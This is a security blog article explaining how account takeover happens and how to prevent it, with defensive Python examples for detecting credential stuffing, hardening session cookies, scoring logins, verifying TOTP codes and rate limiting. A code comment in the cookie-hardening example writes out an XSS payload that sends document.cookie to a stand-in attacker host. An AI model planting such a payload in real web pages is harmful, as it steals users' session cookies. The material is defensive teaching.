What is Account Takeover: Prevention and Protection Strategies


A post by Pieter Arntz on the Malwarebytes blog in August 2023 describes a sad case in which attackers steal LinkedIn accounts and then demand a ransom to return them.

Pieter followed this up with another post in September 2023, giving what he describes as a «firsthand perspective on the recent LinkedIn account takeover». In it, he narrates the experience of a co-worker named Pearce who had been targeted by the campaign.

This is a frightening experience. It gets more frightening when you realize that account takeover is not limited to LinkedIn or social media accounts. Attackers also target employees' work accounts across organizations, and that can mean disaster for your business.

Indeed, account takeover has been skyrocketing year-over-year since the advent of Covid-19. There was a 169% increase in account takeover cases between 2021 and 2022 and a 354% rise between 2022 and 2023.

Such an alarming increase stems from the soaring adoption of online transactions as part of ongoing digitization. As organizations embrace digitization, fraudsters are watching to identify and exploit loopholes to their advantage.

One of the trends leading to numerous companies falling victim to account takeovers is the prioritization of system implementation over security. In the pursuit of the many advantages that technology brings, many are rushing the development and adoption of systems. In the midst of this, they often neglect or forget to test the security of user accounts.

Unfortunately, cyber attackers never let such neglect go unnoticed, and the victims only realize it after losses averaging $12,000 per victim.

The Digital Trust & Safety Index by Sift reveals that fraudsters target digital service subscriptions (36%), online shopping (31%), and bank and credit card accounts (29%).

Make no mistake. Any organization can fall prey since subscription-based models are shaping the future of ecommerce.

So, how secure is your organization against account takeover? This article delves into this threat. 

What does account takeover mean?

Account takeover is a form of identity theft in which a fraudster gains access to a user account without the user's consent and with ill intent.

Once logged in, the fraudster can conduct malicious activities on the account. These include changing the identification and recovery details, scamming users associated with the account, and draining funds.

There are two main types of account takeover:

  1. Corporate Account Takeover (CATO)
  2. Personal account takeover.

Corporate Account Takeover is also known as Business Account Takeover. It involves attackers gaining access to an organization’s account, intending to carry out malicious activities.

Personal account takeover is the most prevalent and involves attackers gaining unauthorized access to a user account rather than an organization’s.

How does an account takeover happen?

Attackers use several ways to take over accounts, whether at business or individual level, with the following five strategies being the most prominent.

1. Brute-force attack and credential stuffing

A brute-force attack involves an attacker systematically guessing passwords (or character combinations) in an attempt to gain unauthorized access to an account. The attacker relies on automated trial and error in the hope of eventually hitting the right login credentials.

Credential stuffing, on the other hand, involves an attacker replaying credentials obtained from an earlier data breach against other services. These credentials typically come as lists of usernames or email addresses paired with their passwords.

Unlike brute force, credential stuffing starts from known-valid credential pairs. Even if they were leaked from an unrelated service, they often work because users reuse passwords, and attackers also derive variants from the patterns in the existing pairs.

Weak passwords and passwords with easy-to-guess patterns are the easiest to break by brute force, and reusing the same password across multiple accounts is what makes credential stuffing succeed.
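
The two attacks leave different footprints in an authentication log, and that difference is what a detection rule keys on. The following is an added example, not code from the original article: it parses a constructed sample log (the IP addresses, usernames and the line format are assumptions made up for this illustration) and classifies each noisy source as credential stuffing (one source cycling through many accounts) or brute force (one source hammering a single account), reporting any successful login from a flagged source as a likely takeover.

```python
import re
from collections import defaultdict

# Constructed sample authentication log (not real traffic). One line per login attempt:
# <timestamp> <source_ip> <username> <OK|FAIL>
SAMPLE_AUTH_LOG = """\
2024-03-01T10:00:01Z 203.0.113.7 alice FAIL
2024-03-01T10:00:02Z 203.0.113.7 bob FAIL
2024-03-01T10:00:02Z 203.0.113.7 carol FAIL
2024-03-01T10:00:03Z 203.0.113.7 dave FAIL
2024-03-01T10:00:03Z 203.0.113.7 erin OK
2024-03-01T10:00:04Z 203.0.113.7 frank FAIL
2024-03-01T10:00:04Z 203.0.113.7 grace FAIL
2024-03-01T10:00:05Z 203.0.113.7 heidi FAIL
2024-03-01T10:01:10Z 198.51.100.23 alice FAIL
2024-03-01T10:01:11Z 198.51.100.23 alice FAIL
2024-03-01T10:01:12Z 198.51.100.23 alice FAIL
2024-03-01T10:01:13Z 198.51.100.23 alice FAIL
2024-03-01T10:01:14Z 198.51.100.23 alice FAIL
2024-03-01T10:01:15Z 198.51.100.23 alice FAIL
2024-03-01T10:01:16Z 198.51.100.23 alice FAIL
2024-03-01T10:02:00Z 192.0.2.44 mallory FAIL
2024-03-01T10:02:05Z 192.0.2.44 mallory OK
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) (?P<user>\S+) (?P<result>OK|FAIL)$"
)


def parse_auth_log(text):
    """Parse log lines into dicts; lines that do not match the format are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            events.append(m.groupdict())
    return events


def detect_attacks(events, stuffing_min_users=5, brute_min_failures=6):
    """Group failures by source IP and classify each noisy source.

    credential_stuffing: one source trying many *different* accounts (breach lists
                         are replayed once or twice per account).
    brute_force:         one source hammering a *single* account with many guesses.
    Any successful login from a flagged source is reported as a likely takeover.
    The thresholds are assumptions for this example; tune them to your traffic.
    """
    fails = defaultdict(lambda: defaultdict(int))   # ip -> user -> failure count
    successes = defaultdict(set)                     # ip -> users that logged in OK
    for e in events:
        if e["result"] == "FAIL":
            fails[e["ip"]][e["user"]] += 1
        else:
            successes[e["ip"]].add(e["user"])

    findings = {}
    for ip, per_user in fails.items():
        kinds = []
        if len(per_user) >= stuffing_min_users:
            kinds.append("credential_stuffing")
        if max(per_user.values()) >= brute_min_failures:
            kinds.append("brute_force")
        if kinds:
            findings[ip] = {
                "kinds": kinds,
                "failed_accounts": len(per_user),
                "likely_compromised": sorted(successes.get(ip, ())),
            }
    return findings


if __name__ == "__main__":
    for ip, finding in detect_attacks(parse_auth_log(SAMPLE_AUTH_LOG)).items():
        print(ip, finding)
```

On the sample, 203.0.113.7 is flagged as credential stuffing with erin's account as the likely compromise, 198.51.100.23 as brute force against alice, and mallory's single failure is ignored. In production the same grouping would run over a sliding time window rather than the whole log.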

2. Data and device interception through phishing

As you may know, phishing involves tricking a user into clicking malicious links delivered via email or messages. The emails give the impression that they are coming from trusted sources, as they impersonate trusted organizations and brands.

The attackers attach a sense of urgency, requiring the potential victim to click the link immediately. Once they click the link, they are redirected to a login page that mimics a legitimate website. 

Trying to log in on this page results in the user unwittingly sharing their login details with attackers, who subsequently utilize this information to gain access to their accounts.

They may also take control of devices and install malware to extract more personally identifiable data.

3. Social engineering

Social engineering involves attackers exploiting human psychology to trick the target audience into providing sensitive data.

The attackers aim to stir up fear, curiosity or anxiety, convincing victims to take actions that compromise their security.

Phishing is an example of social engineering. Other forms of social engineering include:

  • Smishing, vishing, and quishing: All three are forms of phishing. Smishing occurs via SMS, vishing occurs via voice calls, and quishing occurs via QR codes.
  • Pretexting: A form of social engineering where an attacker impersonates a coworker, customer service representative or an authority to extract sensitive data.
  • Baiting: The attacker presents malicious links in the form of exciting offers or gifts. Clicking the link may drive the installation of malware in devices or the sharing of sensitive data.
  • Business email compromise (BEC): The attackers use a compromised or spoofed business email account to lure employees into sharing sensitive organizational data or making payments.
  • CEO fraud: Attackers impersonate top executives, such as CEOs, to trick employees into sharing organizational data.

4. Account login compromise

Have you ever tried to log into your account multiple times unsuccessfully while sure of the login details? Or you were automatically logged out of your account, and suddenly, you cannot log in?

Account login compromise is a form of session or account fixation attack in which the attacker exploits a weak «forgot password» or account-linking flow.

If the application is vulnerable, the attacker triggers the «forgot password» flow for your account. Unable to log in, you are forced to reset your password.

Meanwhile, the attacker links the account to identifiers they control and arranges for you to receive a confirmation link (the «fixation» step).

Once you click the confirmation link, the application ties your account to the attacker's session or identity. The attacker can then impersonate you and transact throughout the session. The underlying flaw is a reset or confirmation token that is not bound to the account and the person who requested it, or that is not invalidated once used.

5. Session hijacking

As the name suggests, this happens during a browser session. The attacker exploits the vulnerabilities of a web application, protocol or service.

There are various ways in which attackers can execute session hijacking for an account takeover.

i. Cross-site scripting (XSS)

Applications that fail to validate input and encode output let attackers inject script into pages that other users view. The injected script can read the session cookie (or token) and send it to the attacker, and it is often delivered as a crafted link to the vulnerable page.

Once a user opens the link, their session identifier, along with any other data the script can reach, is sent to the attacker.

With the emergence of AI chatbots, injection-driven threats are on the rise. Learn more in our article on chatbot injection.

ii. Session side-jacking

Session side-jacking is common on public Wi-Fi. The attacker eavesdrops on a user's network traffic, typically unencrypted HTTP, to identify active sessions.

Once the attacker finds a valuable session, usually a transactional one, they copy the session cookie or token and take over the browsing session.
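
Both of the techniques above (the XSS cookie theft in i and the side-jacking in ii) hinge on the session cookie being reachable: readable from script, or sent in the clear. The following added example, not code from the original article, shows the two server-side fixes side by side: output encoding for user-supplied content, and a session cookie issued with the `HttpOnly`, `Secure` and `SameSite` attributes, plus a small audit helper that reports which of those protections a `Set-Cookie` header is missing. The cookie name `session` and the comment widget are assumptions for the illustration.

```python
import html
from http.cookies import SimpleCookie


def render_comment_vulnerable(comment):
    # Reflects user input without encoding: a comment such as
    # <script>fetch('https://attacker.example/?c='+document.cookie)</script>
    # runs in every visitor's browser and can exfiltrate a readable session cookie.
    return f"<div class=\"comment\">{comment}</div>"


def render_comment_safe(comment):
    # Output encoding turns < > & " ' into entities, so the payload is displayed, not executed.
    return f"<div class=\"comment\">{html.escape(comment, quote=True)}</div>"


def build_session_cookie(session_id, hardened=True):
    """Return the value of a Set-Cookie header carrying the session identifier."""
    c = SimpleCookie()
    c["session"] = session_id
    c["session"]["path"] = "/"
    if hardened:
        c["session"]["httponly"] = True    # not exposed to document.cookie (XSS theft)
        c["session"]["secure"] = True      # never sent over plain HTTP (side-jacking)
        c["session"]["samesite"] = "Lax"   # not attached to most cross-site requests
    return c.output(header="").strip()


def audit_set_cookie(header_value):
    """Return the protections missing from a Set-Cookie header value, e.g. from a scan."""
    attrs = {part.strip().split("=", 1)[0].lower() for part in header_value.split(";")[1:]}
    return [flag for flag in ("HttpOnly", "Secure", "SameSite") if flag.lower() not in attrs]


if __name__ == "__main__":
    print(render_comment_safe("<script>alert(1)</script>"))
    print(build_session_cookie("3f9a1c"))                         # hardened header value
    print(audit_set_cookie(build_session_cookie("3f9a1c", False)))  # what the weak one lacks
```

`HttpOnly` does not stop an XSS payload from acting on the user's behalf while the page is open, so it complements output encoding rather than replacing it; `Secure` only helps if the site also redirects HTTP to HTTPS and sets HSTS, otherwise the first plaintext request is still exposed.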

iii. Malware injection

There are malware programs designed to monitor a user's network traffic and browser activity. The attacker typically delivers the program through a malicious link or attachment. Once you click it, the malware installs itself and your traffic and credentials are relayed to the attacker.

iv. Man in the browser attack (MitB)

A MitB attack allows an attacker to modify web page content and tamper with HTTP requests and responses from inside the browser. They can also steal sensitive information that the user enters, all without the user noticing.

The attacker essentially injects code into the user's browser, typically through a malicious extension or a trojan, and hijacks the authenticated session to carry out malicious activities.

Common indicators of account takeover

One successful account takeover can lead an attacker into multiple accounts, leading to significant losses. So, it’s essential to know how to identify an account takeover in case it happens.

These are the common signs to look out for: 

1. Abrupt changes in account information

Attackers change a user's account details, including the recovery email address and phone number, once logged in, often to lock the legitimate user out. The sooner this is noticed, the better.

2. Unusual account login failure

A login failure isn't always a network problem or downtime. Whenever a user reports that valid credentials have suddenly stopped working, check the account's recent activity with the service provider.

3. Anomalous activity in a user account

Unusual activities include transactions the user did not make, unexpected notifications and changes in account details. For instance, a user may receive a notice that they updated their account information when they did not.

Whenever a user reports these occurrences, help them change their password and immediately follow up with your service provider.

4. Unfamiliar login patterns

These include logins from devices the user does not recognize, from places they have not been, and at odd hours.
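
The indicators in 4 become actionable when each new login is scored against the user's own history rather than a global rule. The following is an added example, not code from the original article: it keeps a constructed per-user baseline of past device fingerprints, countries and login hours (the user, device IDs and country codes are made up for the illustration), scores a new login on each unfamiliar dimension, and maps the score to a response. The scoring weights and the "notify at 1, step up at 2" policy are assumptions, not a standard.

```python
from datetime import datetime, timezone

# Constructed login history (not real data): for each user, successful logins as
# (ISO-8601 timestamp, device fingerprint, country code).
KNOWN_LOGINS = {
    "alice": [
        ("2024-02-20T09:12:00+00:00", "dev-a1", "DE"),
        ("2024-02-21T08:55:00+00:00", "dev-a1", "DE"),
        ("2024-02-22T17:30:00+00:00", "dev-a2", "DE"),
    ],
}


def _hour_utc(ts):
    return datetime.fromisoformat(ts).astimezone(timezone.utc).hour


def login_risk(user, ts, device, country, history=KNOWN_LOGINS, hour_slack=2):
    """Score a new login against the user's own baseline and pick a response.

    Each unfamiliar dimension (device, country, hour of day) adds one point:
      0 -> allow, 1 -> allow but notify the user, 2+ -> require step-up MFA.
    The hour check uses the span of past login hours widened by `hour_slack`
    on each side; for simplicity it does not handle spans that wrap past midnight.
    """
    past = history.get(user, [])
    if not past:
        # No baseline yet: nothing to compare against, but worth telling the user.
        return {"user": user, "score": 1, "reasons": ["no_baseline"], "action": "notify_user"}

    reasons = []
    if device not in {d for _, d, _ in past}:
        reasons.append("new_device")
    if country not in {c for _, _, c in past}:
        reasons.append("new_country")
    hours = [_hour_utc(t) for t, _, _ in past]
    lo, hi = min(hours) - hour_slack, max(hours) + hour_slack
    if not (lo <= _hour_utc(ts) <= hi):
        reasons.append("odd_hour")

    score = len(reasons)
    action = "allow" if score == 0 else "notify_user" if score == 1 else "step_up_mfa"
    return {"user": user, "score": score, "reasons": reasons, "action": action}


if __name__ == "__main__":
    print(login_risk("alice", "2024-03-01T03:10:00+00:00", "dev-z9", "RU"))
    print(login_risk("alice", "2024-03-01T09:00:00+00:00", "dev-a1", "DE"))
```

A login from a new device, a new country and at 03:10 UTC scores 3 and triggers step-up MFA; the same user on a known device from Germany during her usual hours scores 0 and is allowed. Real deployments add impossible-travel checks (distance between consecutive logins divided by time) and feed the score to the SIEM rather than deciding inline.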

How can your organization prevent account takeover?

The 2020 Global Identity and Fraud Report by Experian revealed that 57% of enterprise organizations suffer high losses associated with account takeover fraud.

So it’s important to stay vigilant and defend all users from account takeover. Exercise the following preventive measures to protect everyone in the organization from falling prey to account takeover.

1. Effective ATO awareness and training

An effective ATO awareness entails ensuring all the organization’s departments understand ATO, its causes, cost and prevention measures.

Social engineering is the most prevalent tactic attackers use to take over an organization's accounts, and 73% of data breaches involve a human element.

Create an effective program that educates and trains employees on how to:

  • Take care of the organization’s sensitive information
  • Recognize and report account takeover activities
  • Approach account takeover incidents
  • Effectively manage passwords

Also Read: Benefits of Cybersecurity Awareness Training

2. Encourage the use of strong passwords

Weak passwords are easy prey for brute-force attacks, and reused passwords are what credential stuffing depends on. Encourage employees to use strong, unique passwords for organizational and personal accounts.

A strong password should be at least 12 to 14 characters long and unique to each account. It should mix uppercase and lowercase letters, numbers and symbols, though length and uniqueness matter more than any particular character mix. It shouldn't be the name of an organization, place or person, or a single dictionary word. A password manager makes generating and storing such passwords practical.

3. Employ multi-factor authentication

Multi-factor authentication adds further layers of verification beyond the password. The most common additional factors are:

  • Security tokens (hardware keys)
  • Biometric authentication
  • One-time passcodes (OTP), typically time-based codes from an authenticator app

With multi-factor authentication in place, an attacker who has obtained the password still cannot log in unnoticed without the second factor. Note that OTP codes can be phished or relayed in real time by a proxy site, so phishing-resistant factors such as FIDO2 hardware keys or passkeys are preferable for high-value accounts.
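
To make the one-time passcode factor concrete, the following added example (not code from the original article) implements time-based one-time passwords as specified in RFC 6238 on top of RFC 4226 HOTP, and a verifier that accepts one step of clock skew, compares in constant time, and refuses to accept a counter that has already been used, so an intercepted code cannot be replayed. The secret is the RFC 6238 Appendix B test secret so the output can be checked against the published vectors; the window size and the replay bookkeeping are the usual choices, not mandated by the RFC.

```python
import hashlib
import hmac
import struct
import time


def hotp(secret, counter, digits=6):
    """RFC 4226 HOTP: HMAC-SHA1 over the 8-byte big-endian counter, dynamically truncated."""
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


def totp(secret, for_time, step=30, digits=6):
    """RFC 6238 TOTP: HOTP with the counter derived from Unix time in `step`-second slots."""
    return hotp(secret, int(for_time) // step, digits)


def verify_totp(secret, code, now=None, last_used=-1, step=30, window=1, digits=6):
    """Check a submitted code against the current step and +/- `window` neighbours.

    Returns the matching counter (the caller stores it as `last_used` for this user)
    or None. Counters <= last_used are refused so a code that was phished or sniffed
    cannot be replayed within its validity window; the comparison is constant-time.
    """
    now = time.time() if now is None else now
    counter = int(now) // step
    for k in range(-window, window + 1):
        c = counter + k
        if c <= last_used:
            continue
        if hmac.compare_digest(hotp(secret, c, digits), code):
            return c
    return None


# RFC 6238 Appendix B test secret (ASCII "12345678901234567890"). In production the
# secret is random, shared once during enrolment (QR code) and stored like a password.
RFC_SECRET = b"12345678901234567890"

if __name__ == "__main__":
    print(totp(RFC_SECRET, 59))                        # 287082 (RFC vector 94287082, last 6 digits)
    print(verify_totp(RFC_SECRET, "287082", now=89))   # 1: counter 1 is still inside the window
    print(verify_totp(RFC_SECRET, "287082", now=89, last_used=1))  # None: replay refused
```

Because the verifier accepts the code even when it sees it a few seconds late, a real-time phishing proxy that forwards the victim's code immediately will also be accepted; this is exactly why OTP is not considered phishing-resistant and why the replay check, while necessary, is not sufficient on its own.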

Please check out our full multi-factor authentication guide

4. Enhance API and application login security

Broken or missing authentication checks, stolen tokens and credentials, man-in-the-middle interception and injection flaws are the leading routes to account takeover through APIs.

Use these tips to strengthen the security of APIs and application logins:

  • Use API gateways: A tool responsible for user request composition, routing and policy enforcement.
  • Implement rate limiting (maximum number of calls allowed within a particular time interval)
  • Regular auditing and logging: Basically documenting all the activities undertaken by users within the account 
  • Use TLS (SSL is obsolete and should be disabled) to authenticate the server and protect credentials and tokens in transit.
  • Implement a web application firewall to filter incoming traffic
  • Perform regular updates and patching  to apply the latest security updates
  • Implement authorization and authentication to ensure only authorized users access applications
  • Use behavioral analytics to monitor anomalous activities 
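
Rate limiting is the cheapest of the measures above, and it works best when it is applied twice: per source address, which blunts credential stuffing, and per target account, which blunts brute force regardless of where the guesses come from. The following is an added example, not code from the original article: a sliding-window limiter checked before the password is even verified. The limits (20 attempts per IP per minute, 5 per account per 5 minutes) are assumptions for the illustration, and the in-memory state is per process; a real deployment keeps it in a shared store so all API instances see the same counts.

```python
from collections import defaultdict, deque


class SlidingWindowLimiter:
    """Allow at most `limit` events per key within any `window`-second span."""

    def __init__(self, limit, window):
        self.limit = limit
        self.window = window
        self._hits = defaultdict(deque)   # key -> timestamps of recent events

    def allow(self, key, now):
        q = self._hits[key]
        while q and now - q[0] >= self.window:   # drop events that have aged out
            q.popleft()
        if len(q) >= self.limit:
            return False
        q.append(now)
        return True

    def reset(self, key):
        """Forget a key, e.g. after a successful login so a user is not penalised for typos."""
        self._hits.pop(key, None)


# Two independent budgets (values are assumptions for this example): a per-IP one that
# catches credential stuffing (many accounts from one source) and a per-account one that
# catches brute force (many guesses at one account from anywhere).
PER_IP = SlidingWindowLimiter(limit=20, window=60)
PER_ACCOUNT = SlidingWindowLimiter(limit=5, window=300)


def check_login_attempt(ip, username, now):
    """Return (allowed, reason); call this before touching the password at all."""
    if not PER_IP.allow(ip, now):
        return False, "ip_rate_limited"
    if not PER_ACCOUNT.allow(username.lower(), now):
        return False, "account_rate_limited"
    return True, "ok"


def on_login_success(username):
    PER_ACCOUNT.reset(username.lower())


if __name__ == "__main__":
    for t in range(6):
        print(t, check_login_attempt("198.51.100.23", "alice", t))   # 6th attempt is refused
```

The account-level limit is keyed on the normalised username so that `Alice` and `alice` share a budget, and the per-IP limit is evaluated first so a stuffing source is cut off before it can exhaust many individual account budgets. Return a generic error to the client in both cases; a distinct "account locked" message tells an attacker which usernames exist.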

For more on threats to APIs, it's important to get familiar with the most common types of attacks that can be targeted at APIs. We also have another resource where we explain the best practices for API security.

5. Use intelligent threat detection and remediation tools

Attackers keep advancing their tactics, which means that manual methods of identification and mitigation may not stand a chance against sophisticated attackers.

Fortunately you can employ automated account monitoring and remediation tools. These tools can identify, analyze and mitigate cybersecurity threats in real-time while providing insights to secure organizational data.

The monitoring and remediation tooling that does this job in practice is built around Security Information and Event Management (SIEM), which collects and correlates login and account events so the indicators listed earlier can be spotted, and Security Orchestration, Automation, and Response (SOAR), which automates the response, such as forcing a password reset or revoking sessions. For a comprehensive understanding of these technologies, read our articles on What is SIEM and What is SOAR. Once you're familiar with these concepts, you may want to explore some of the top tools available in the market. Check out our recommendations in Best SIEM Tools and Best SOAR Tools.

Account takeover is a threat to 1 out of every 4 organizations!

According to a report published in Statista, account takeover affected 25% of organizations in 2022 globally. This translates to one in every four organizations. However, the attacks are escalating each year, with the increasing adoption of online transactions.

This is a scenario that we cannot take lightly in business. Please implement the account takeover prevention best practices in this guide.

For overall tips on guarding against cyber threats in general, please check these key steps for cybersecurity remediation.
